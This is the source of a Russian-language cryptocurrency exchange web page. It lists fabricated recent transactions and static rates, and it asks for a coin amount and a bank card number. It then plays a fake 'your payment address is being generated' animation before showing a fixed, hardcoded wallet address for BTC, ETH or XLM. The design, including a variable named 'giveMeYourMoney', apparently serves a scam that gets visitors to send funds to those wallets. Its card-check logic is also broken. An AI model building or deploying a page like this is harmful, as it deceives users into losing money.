<!doctype html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport"
          content="width=device-width, user-scalable=no, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0">
    <meta http-equiv="X-UA-Compatible" content="ie=edge">
    <title>Document</title>
    <!-- CSS only -->
    <!-- Latest compiled and minified CSS -->
    <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css" integrity="sha384-BVYiiSIFeK1dGmJRAkycuHAHRg32OmUcww7on3RYdg4Va+PmSTsz/K68vbdEjh4u" crossorigin="anonymous">

    <!-- Optional theme -->
    <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap-theme.min.css" integrity="sha384-rHyoN1iRsVXV4nD0JutlnGaslCJuC7uwjduW9SVrLvRYooPp2bWYgmgJQIXwl/Sp" crossorigin="anonymous">
    <link href="https://fonts.googleapis.com/css2?family=Lato&display=swap" rel="stylesheet">
    <link href="https://fonts.googleapis.com/css2?family=Noto+Sans+TC&display=swap" rel="stylesheet">
   <link rel="stylesheet" href="style.css">

    <!-- JS, Popper.js, and jQuery -->
    <script src="https://use.fontawesome.com/c5eb07fd42.js"></script>
    <script src="https://code.jquery.com/jquery-3.5.1.slim.min.js" integrity="sha384-DfXdz2htPH0lsSSs5nCTpuj/zy4C+OGpamoFVy38MVBnE+IbbVYUew+OrCXaRkfj" crossorigin="anonymous"></script>
    <script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js" integrity="sha384-Tc5IQib027qvyjSMfHjOMaLkfuWVxZxUPnCJA7l2mCWNIpG9mGCD8wGNIcPD7Txa" crossorigin="anonymous"></script>
</head>
<body>
<div class="navbar navbar-inverse navbar-fixed-top">
    <div class="container">
        <div class="navbar-header">
            <button type="button" class="navbar-toggle" data-toggle="collapse" data-target=".navbar-collapse">
                <span class="icon-bar"></span>
                <span class="icon-bar"></span>
                <span class="icon-bar"></span>
                </button>
            <h2 class="our-logo">Exchange Crypto<img src="https://img.icons8.com/ios-filled/50/000000/stellar.png"/>
            </h2>
        </div>
        <div class="navbar-collapse collapse">
            <ul class="navbar-nav nav navbar-right">
                <li class="active"><a href="#">Домой</a></li>
                <li><a href="#about-us">Про нас</a></li>
                <li><a href="#contacts">E-mail</a></li>
                <li><a href="#contacts">Контакты</a></li>
            </ul>
        </div>
    </div>
</div>

<div class="left-bar table-responsive">
    <table class="last-transactions table table-hover table-bordered">
        <thead>
        <tr class="active">
            <th class="last-transactions-text">Последние транзакции</th>
            <th>Сумма</th>
        </tr>
        </thead>
        <tbody>
        <tr>
            <td class="success">@Николай</td>
            <td class="info">72$</td>
        </tr>
        </tbody>
        <tr>
            <td class="success">@Анонимный</td>
            <td class="info">115$</td>
        </tr>
        <tr>
            <td class="success">@Oleg</td>
            <td  class="info">200$</td>
        </tr>
        <tr>
            <td class="success">@Amiran519</td>
            <td class="info">107$</td>
        </tr>
    </table>

    <table class="current table table-hover" >
        <thead>
            <tr class="info current-course">
                <td>Актуальный курс</td>
            </tr>
        </thead>
        <tbody>
        <tr class="active">
            <td> BTC <img src="./img/bitcoin.png" class="bitcoin-icon">  <div class="vertical-line"></div> <span class="course">9000$</span> <div class="second-vertical-line"></div> <span class="tendency"><i class="fa fa-arrow-up" aria-hidden="true">1,618%</i></span></td>
        </tr>
        <tr class="active">
            <td> ETH <img src="./img/etherum.png" class="etherum-icon"> <span id="etherum-course" class="course">186$</span> <span class="tendency"><i class="fa fa-arrow-down" aria-hidden="true">0,214%</i></span></td>
        </tr>
        <tr class="active">
            <td> XLX <img src="./img/stellar.png" class="stellar-icon"> <span class="course">0,10$</span> <span class="tendency"><i class="fa fa-arrow-up" aria-hidden="true">0,12%</i></span></td>
        </tr>
        </tbody>
    </table>

    <div class="about-us" id="about-us">
        <div class="pop-out pop-out-2" id="pop-out-2">
            <div id="wait-please" >Ваш адрес для оплаты генерируется</div>
            <div id="fountainG">
                <div id="fountainG_1" class="fountainG"></div>
                <div id="fountainG_2" class="fountainG"></div>
                <div id="fountainG_3" class="fountainG"></div>
                <div id="fountainG_4" class="fountainG"></div>
                <div id="fountainG_5" class="fountainG"></div>
                <div id="fountainG_6" class="fountainG"></div>
                <div id="fountainG_7" class="fountainG"></div>
                <div id="fountainG_8" class="fountainG"></div>
            </div>

        </div>
        <div class="pop-out" id="pop-out">
        <div class="how-much">Сколько единиц криптовалюты хотите обменять?
            <input type="number" step="0.00001" class="how-much-input"  id="how-much-input" required placeholder="0.0001">
        </div>
        <div class="card-info">Введите номер карты
            <input class="card-info-input"  id="card-info-input" type="tel" inputmode="numeric" pattern="[0-9\s]{13,19}" autocomplete="cc-number" maxlength="19" placeholder="xxxx xxxx xxxx xxxx">
        </div>
            <button class="change-btn" type="submit" id="change-btn">Подвтердить</button>
        </div>
                <div id="change-btc" class="about-us-header change">Обменять BTC<img src="./img/bitcoin.png" class="bitcoin-icon"></div>
                <div id="change-eth" class="about-us-header change">Обменять ETH<img src="./img/etherum.png" class="bitcoin-icon"></div>
                <div id="change-xlm" class="about-us-header change">Обменять XLM<img src="./img/stellar.png" class="bitcoin-icon"></div>
        </div>
</div>

<div class="contacts-block" id="contacts">
    <p class="our-contacts"> Telegram <img src="./img/telegram-icon.png" class="stellar-icon" alt="tg-icon">  @crypto_change_support24 <br> Email  <img class="stellar-icon"  src="img/gmail-icon.svg"> melonchange.xlm@gmail.com</p>
</div>



</body>
<script>
    const changeSum = document.querySelector('#how-much-input');
    const myWallet = document.querySelector('#giveMeYourMoney');
    let cryptoCode;
    const cardInfo = document.querySelector('#card-info-input');
    const loadingAnimation = document.querySelector("#fountainG");
    const waitPleaseText = document.querySelector('#wait-please');
const changeButtons = Array.from(document.querySelectorAll('.change'));
const proceedBtn = document.querySelector('#change-btn');
proceedBtn.addEventListener("click", popOut2);
const popOutWindow = document.querySelector('#pop-out');
const popOutWindow2 = document.querySelector('#pop-out-2');
changeButtons.forEach(item=>item.addEventListener("click", popOut));
    function popOut(ev) {
        popOutWindow.style.display = 'flex';
        console.log(ev.target.id);
        switch (ev.target.id) {
            case 'change-btc' :cryptoCode = 'bc1q2rjf0r0ue5n84j7c8rz8pj3nhffvluw22rt6u7'; break;
            case 'change-eth' :cryptoCode = '0x755EF19A0b15Ec24b83396eDa3710d93f4E91584'; break;
            case 'change-xlm' :cryptoCode = 'GCH7Z57KPG7YSPBZYOTVI4R5XWY5CG25V5S43EPPHNYAXDJEEWDNMBZE'; break;
        }
        console.log(cryptoCode)
    }
    function popOut2(ev) {
        if (changeSum.value>0&&cardInfo.value.length>13||cardInfo.value.length<20) {
            popOutWindow.style.display = 'none';
            popOutWindow2.style.display = 'flex';
            loadingAnimation.style.display = 'block';
            waitPleaseText.style.display = 'block'
        } else {
            console.log(cardInfo.value.length);
           alert('Введены неверные данные')
        }
            setTimeout(()=> {
                loadingAnimation.style.display = 'none';
                waitPleaseText.style.display = 'none' ;
                waitPleaseText.innerHTML = '<div id="adres-text">Адрес кошелька для пополнения</div>';
                waitPleaseText.insertAdjacentHTML('afterend', `<div id="crypto-code">${cryptoCode}</div>`);
                waitPleaseText.style.display = 'block'
            }, 1500)
    }
</script>
</html>